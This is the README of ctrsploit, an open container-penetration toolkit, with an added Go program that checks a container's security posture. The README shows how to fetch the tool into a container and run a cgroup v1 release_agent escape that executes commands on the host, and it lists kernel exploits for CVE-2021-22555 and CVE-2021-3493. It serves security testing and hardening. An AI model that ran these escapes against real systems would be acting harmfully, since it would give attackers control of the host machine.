ctrsploit / ctrsploit

Licence: other
A penetration toolkit for container environment

Programming languages: go, Dockerfile, python, shell, c

ctrsploit: A penetration toolkit for container environment

Chinese documentation

ctrsploit [kənˈteɪnər splɔɪt]

Why ctrsploit

see here

Pre-Built Release

https://github.com/ctrsploit/ctrsploit/releases

Build it yourself

Build the target binary with the Docker container toolkit:

git clone https://github.com/ctrsploit/ctrsploit.git
cd ctrsploit
docker build . -t ctrsploit_builder
chmod +x build/build.sh
# automatic build
docker run -v "$(pwd)":/ctrsploit --rm ctrsploit_builder

Or build manually:

...
docker run -it -v "$(pwd)":/ctrsploit --rm ctrsploit_builder /bin/sh
build_ctrsploit

Note: To change the target platform, edit the OS/arch parameter string in the build/build.sh file, e.g. -osarch="linux/amd64"

Usage

Quick-Start

wget -O ctrsploit https://github.com/ctrsploit/ctrsploit/releases/download/v0.4/ctrsploit_linux_amd64 && chmod +x ctrsploit
./ctrsploit --help
NAME:
   ctrsploit - A penetration toolkit for container environment

ctrsploit is a command line ... //TODO


USAGE:
   ctrsploit [global options] command [command options] [arguments...]

COMMANDS:
   auto, a     auto gathering information, and detect vuls, and exploit // TODO
   exploit, e  run a exploit
   env, e      gather information // TODO
   help, h     Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --lang value  language for the greeting (default: "english")
   --help, -h    show help (default: false)

gather information

usage

root@ctr:/# ./ctrsploit env
NAME:
   ctrsploit env - gather information

USAGE:
   ctrsploit env command [command options] [arguments...]

COMMANDS:
   where, w        detect whether you are in the container, and which type of the container
   graphdriver, g  detect graphdriver type and extend information
   cgroups, c      gather cgroup information
   help, h         Shows a list of commands or help for one command

OPTIONS:
   --help, -h  show help (default: false)

where

root@ctr:/# ./ctrsploit  env  w
INFO[0000] ===========Docker=========
.dockerenv exists: ✔
rootfs contains 'docker': ✔
cgroup contains 'docker': ✘
the mount source of /etc/hosts contains 'docker': ✔
hostname match regex ^[0-9a-f]{12}$: ✔
=> is in docker: ✔ 
INFO[0000] ===========k8s=========
/var/run/secrets/kubernetes.io exists: ✘
hostname match k8s pattern: ✘
the mount source of /etc/hosts contains 'pods': ✘
cgroup contains 'kubepods': ✘
=> is in k8s: ✘ 

run an exploit

root@2aa13a052102:/# ./ctrsploit e
NAME:
   ctrsploit exploit - run a exploit

USAGE:
   ctrsploit exploit command [command options] [arguments...]

COMMANDS:
   cgroupv1-release_agent, ra                       escape tech by using the notify_on_release of cgroup v1
   cgroupv1-release_agent-unknown_rootfs, ra3       escape tech by using the notify_on_release of cgroup v1 without known rootfs
   help, h                                          Shows a list of commands or help for one command

OPTIONS:
   --help, -h  show help (default: false)

E.g., escaping with the 'cgroupv1-release_agent' technique:

root@host # docker run -ti --rm --security-opt="apparmor=unconfined" --cap-add="sys_admin" busybox
root@ctr # wget -O ctrsploit https://github.com/ctrsploit/ctrsploit/releases/download/v0.4/ctrsploit_linux_amd64 && chmod +x ctrsploit
root@ctr # ./ctrsploit e ra -c "cat /etc/hostname"

check security

Run ctrsploit checksec, or the standalone checksec binary, inside the container.

[root@ctr ~]# /checksec_linux_amd64 
===========Seccomp=========
kernel supported: ✔
seccomp enabled in current container: ✘

===========Apparmor=========
Kernel Supported: ✘
Container Enabled: ✘

===========Cgroups=========
is cgroupv1: ✔
is cgroupv2: ✘

------sub systems-------
["perf_event" "memory" "net_cls" "cpuset" "blkio" "hugetlb" "files" "cpu" "cpuacct" "pids" "rdma" "freezer" "devices" "net_prio"]

--------top level subsystem----------
["rdma"

Details

env

| command | alias | description |
| --- | --- | --- |
| where | w | detect whether you are in the container, and which type of the container |
| graphdriver | g | detect graphdriver type and extend information |
| cgroups | c | gather cgroup information |
| capability | cap | show the capability of pid 1 and current process |
| seccomp | s | show the seccomp info |
| apparmor | a | show the apparmor info |

exploit

| exploit | alias | description |
| --- | --- | --- |
| cgroupv1-release_agent | ra | escape tech by using the notify_on_release of cgroup v1 |
| cgroupv1-release_agent-unknown_rootfs | ra3 | escape tech by using the notify_on_release of cgroup v1 without known rootfs |
| cve-2021-22555_ubuntu18.04 | 22555 | escape tech by using the CVE-2021-22555 (ubuntu18.04) |

helper

| helper | alias | description |
| --- | --- | --- |
| cve-2021-3493 | ubuntu-overlayfs-pe,3493 | Ubuntu OverlayFS Local Privesc |

checksec

Run ctrsploit checksec, or the standalone checksec binary.
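
The settings that checksec reports, and that the docker run line in the release_agent example relaxes (CAP_SYS_ADMIN added, AppArmor unconfined, cgroup v1), can also be read straight from /proc when auditing a workload. The Go program below is an added example, not code from ctrsploit; the names Posture, Audit and Risky are hypothetical, and it assumes AppArmor is the LSM behind /proc/self/attr/current.

```go
package main

import (
	"fmt"
	"os"
	"strconv"
	"strings"
)

const capSysAdmin = 21 // bit index of CAP_SYS_ADMIN in the capability masks

// Posture holds the hardening facts a defender reads off checksec-style output.
type Posture struct {
	SysAdmin, SeccompOn, AppArmorOn, CgroupV1 bool
}

// Audit parses the text of /proc/self/status, /proc/self/attr/current and /proc/self/mounts.
func Audit(status, aaLabel, mounts string) Posture {
	var p Posture
	for _, line := range strings.Split(status, "\n") {
		key, val, _ := strings.Cut(line, ":")
		val = strings.TrimSpace(val)
		switch key {
		case "CapEff": // hex mask of the effective capability set
			if m, err := strconv.ParseUint(val, 16, 64); err == nil {
				p.SysAdmin = m&(1<<capSysAdmin) != 0
			}
		case "Seccomp": // 0 = disabled, 1 = strict, 2 = filter
			p.SeccompOn = val == "1" || val == "2"
		}
	}
	aaLabel = strings.TrimSpace(aaLabel) // assumption: the label comes from AppArmor, not another LSM
	p.AppArmorOn = aaLabel != "" && aaLabel != "unconfined"
	for _, line := range strings.Split(mounts, "\n") {
		if f := strings.Fields(line); len(f) >= 3 && f[2] == "cgroup" {
			p.CgroupV1 = true // fstype "cgroup" is v1; v2 mounts as "cgroup2"
		}
	}
	return p
}

// Risky flags the combination from the example: CAP_SYS_ADMIN on cgroup v1 with AppArmor off.
func (p Posture) Risky() bool { return p.SysAdmin && p.CgroupV1 && !p.AppArmorOn }

func main() {
	read := func(path string) string { b, _ := os.ReadFile(path); return string(b) }
	p := Audit(read("/proc/self/status"), read("/proc/self/attr/current"), read("/proc/self/mounts"))
	fmt.Printf("%+v risky=%v\n", p, p.Risky())
}
```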
